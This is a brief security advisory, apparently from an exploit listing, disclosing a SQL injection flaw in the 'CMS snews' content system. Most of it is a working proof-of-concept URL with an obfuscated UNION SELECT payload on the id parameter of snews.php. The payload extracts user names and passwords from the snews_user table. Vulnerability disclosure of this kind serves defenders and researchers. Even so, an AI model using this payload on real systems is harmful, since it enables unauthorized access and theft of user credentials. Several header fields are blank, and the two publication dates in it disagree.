CMS snews SQL Injection Vulnerability
Published on March 14th, 2013
Summary
Credit:
Details
Vulnerable Systems:
* CMS snews
SQL poc:
http://localhost/snews/snews.php?act=shownews&id=[SQL]
Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
Disclosure Timeline:
Published: 2013-01-15